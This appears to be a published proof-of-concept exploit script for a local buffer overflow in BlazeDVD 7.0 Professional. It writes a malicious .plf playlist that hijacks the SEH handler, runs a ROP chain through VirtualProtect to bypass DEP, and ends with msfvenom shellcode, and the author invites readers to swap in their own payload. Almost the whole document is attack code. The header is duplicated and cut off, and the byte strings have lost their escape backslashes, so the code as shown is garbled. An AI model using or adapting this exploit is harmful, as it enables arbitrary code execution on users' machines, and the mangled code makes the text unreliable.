## Author: emalp
## Date: 2020-08-31
## Vendor Homepage: http://www.blazevideo.com/
## Sof ## Title: BlazeDVD 7.0 Professional - '.plf' Local Buffer Overflow (SEH,ASLR,DEP)
## Author: emalp
## Date: 2020-08-31
## Vendor Homepage: http://www.blazevideo.com/
## Software Link: http://www.blazevideo.com/download/BlazeDVDProSetup.exe
## Version: 7.0.0.0
## Tested on: Windows 7 Home Basic
# Run this file
# bfile.plf will be generated
# In blazeDVD open playlist and select bfile.plf
# a pop up box will appear with text 'emalp'
## Change shellcode according to your needs
## Shellcode max size is aroung 700 bytes.
# bad chars:
# x00, x0a, x0b, x1a
import struct
bfile = open('bfile.plf','w')
buf = 'A'*84
buf += struct.pack('<L', 0x60325143) # add esp, 0c; ret
buf += 'AAAA' # ret 04 ting from sehandler
buf += 'AAAA'*3 # bypassing 12 bytes i.e 0c
buf += struct.pack('<L', 0x6402091b) # add esp, 200; ret
buf += 'A'*500
buf += 'BBBB' # nseh
buf += struct.pack('<L', 0x640205b1) #sehandler; add esp, 4a0; ret 0x04
#---------------------------------------------------------------------
# this way we have a lot more space for shellcode.
buf += 'AAAA'
# esp lands here.
#setting up the dynamic pointer for virtual protect
buf += struct.pack('<L', 0x61640e32) # pop eax; retn.
buf += struct.pack('<L', 0xffed06a4) # opp of 0012f95c; contains pointer to k32
buf += struct.pack('<L', 0x603267d4) # neg eax, now eax contains 0012f95c
buf += struct.pack('<L', 0x616306ed) # mov eax, dword ptr ds:[eax]
# now eax has the kernel32.dll pointer
buf += struct.pack('<L', 0x61640f09) # push eax, pop esi, ret 04
buf += struct.pack('<L', 0x61640e32) # pop eax ret
buf += 'XXXX' # ret 4 padding
buf += struct.pack('<L', 0xffff675d) # neg to 98a3
buf += struct.pack('<L', 0x603267d4) # neg eax; ret
# right now eax = 98a3; esi = [0012f95c] = k32.dll val
buf += struct.pack('<L', 0x6033dcc4) # xchg eax,ecx; xor al,60; ret
buf += struct.pack('<L', 0x61644904) # mov eax,esi; pop esi; ret
buf += 'XXXX' # pop esi padding
buf += struct.pack('<L', 0x641045f4) # sub eax,ecx
# now eax has the pointer to VirtualProtect
#------------------------------------------------------------------------
# SETTING THE REGISTERS FOR VIRTUALPROTECT PARAM
# SETTING ESI
buf += struct.pack('<L', 0x61640f09) # push eax, pop esi; ret 4
# SETTING EBP
buf += struct.pack('<L', 0x60327f8f) # pop ebp; ret
buf += 'XXXX' # prev ret 4 padding
buf += struct.pack('<L', 0x60349b63) # jmp esp
# SETTING EBX
buf += struct.pack('<L', 0x61629938) # pop eax; ret
buf += struct.pack('<L', 0xfffffdff) # neg to 0x201
buf += struct.pack('<L', 0x6033b16b) # neg eax; ret
buf += struct.pack('<L', 0x61640124) # xchg eax,ebx
# SETTING EDX
buf += struct.pack('<L', 0x616310e8) # pop eax; ret
buf += struct.pack('<L', 0xffffffc0) # neg of 0x40
buf += struct.pack('<L', 0x6033b16b) # neg eax; retn
buf += struct.pack('<L', 0x61608ba2) # xchg eax,edx
# SETTING ECX
buf += struct.pack('<L', 0x6404fbb9) # pop ecx; ret
buf += struct.pack('<L', 0x1001524e) # writable location
# SETTING EDI
buf += struct.pack('<L', 0x6032b0b8) # pop edi; ret
buf += struct.pack('<L', 0x6162e802) # retn (rop nop)
# SETTING EAX
buf += struct.pack('<L', 0x6162d638) # pop eax; retn
buf += struct.pack('<L', 0x90909090) # nop
# FINALLY PUSHAD
buf += struct.pack('<L', 0x6033cd4a) # push ad
buf += 'x90x90x90x90'*4
# shellcode generated using:
# msfvenom -a x86 --platform windows -p windows/messagebox TEXT="emalp"
# -b 'x00x0ax0bx1a'
buf += (
"xbbx42xa8xb5x43xdaxc7xd9x74x24xf4x5ax33xc9xb1"
"x41x83xc2x04x31x5ax0fx03x5ax4dx4ax40x9axbax11"
"x72x69x18xd2xb4x40xd2x6dx86xadx76x19x99x1dxfd"
"x6bx56xd5x77x88xedxafx7fx3bx8fx0fxf4x0dx48x1f"
"x12x07x5bxc6x23x36x64x18x43x33xf7xffxa7xc8x4d"
"x3cx2cx9ax65x44x33xc9xfdxfex2bx86x58xdfx4ax73"
"xbfx2bx05x08x74xdfx94xe0x44x20xa7x3cx5ax72x43"
"x7cxd7x8cx8axb2x15x92xcbxa6xd2xafxafx1cx33xa5"
"xaexd6x19x61x31x02xfbxe2x3dx9fx8fxafx21x1ex7b"
"xc4x5dxabx7ax33xd4xefx58xdfx87x2cx12xd7x6ex67"
"xdax0dxf9x45xb5x43xb7x47xaax0exafxc7xcdx50xd0"
"x71x74xabx95xfcxafx51x9ax87x4cxb2x0ex60xe2x45"
"x51x8fx72xfcxa5x18xe9x93x95x99x99x58xe7x37x3e"
"xf7x72x3bxdbx75x4cx60xabx26x88x9cx25x30x86x5f"
"x60xb9xafx62xdbx7ax07xc0x91xc0xd0x19x0ex6bx36"
"x7exb1x74x39xe9x22xf3x9dxcaxd4x62x7ax6ex67x0d"
"xc9x15x14xbexe0x0ex52x1cx26xbbxeax7ex4excbxb4"
"xa0xaex43x20xccxcfxffx9bxc7x87x4cxf8xd2x1exad"
"x31x0fx72x7dx63xfdx8dx51xb2xc1x21xadxe0xc9"
)
buf += 'x90x90x90x90'*5
buf += 'E'*200
bfile.write(buf)
bfile.close()